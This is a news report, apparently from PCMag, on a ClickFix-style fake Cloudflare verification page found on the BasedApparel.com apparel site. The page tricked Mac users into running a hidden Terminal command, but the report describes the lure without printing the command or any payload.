GoKawiilAn apparel site from FBI director Kash Patel has been spotted trying to trick macOS users into installing malware.
The site, BasedApparel.com, is part of a merchandise brand that Patel co-created with Andrew Ollis prior to becoming FBI director under the Trump administration. On Thursday, a user based in Portugal spotted the online shop hosting a “ClickFix”-style attack that tries to dupe unsuspecting users into running a malicious command on their Mac computers.
The attack seems to work as the user visits BasedApparel.com; a victim will encounter the site showing a page pretending to come from Cloudflare, which powers “Verify you are human” CAPTCHA tests and offers DDoS protection.
You May Also Like
The fake Cloudflare page will show a warning saying “Unusual Web Traffic Detected,” while also requiring the user to verify that they’re human. But to do so, the page posts some unusual instructions that call for the user to open Terminal, a built-in utility in macOS that can execute programs.
(PCMag)
The user is then told to click the “Copy" button on the page to copy the command “I am not a robot: Cloudflare Verification ID: 801470." But in reality, clicking the button will actually copy a much longer obfuscated text that looks like gibberish, although it's actually a hidden command.
The actual copied command when you click the copy button. (PCMag)
The user is then told to paste and run the command in Terminal, thus executing the instructions without realizing the danger. The hidden command will decode, and fetch a shell script containing a list of commands from the hacker-controlled web domain.
PCMag encountered the attack while navigating BasedApparel.com on a MacBook, although we were only able to trigger the fake Cloudflare page once over the Chrome browser.
... continue reading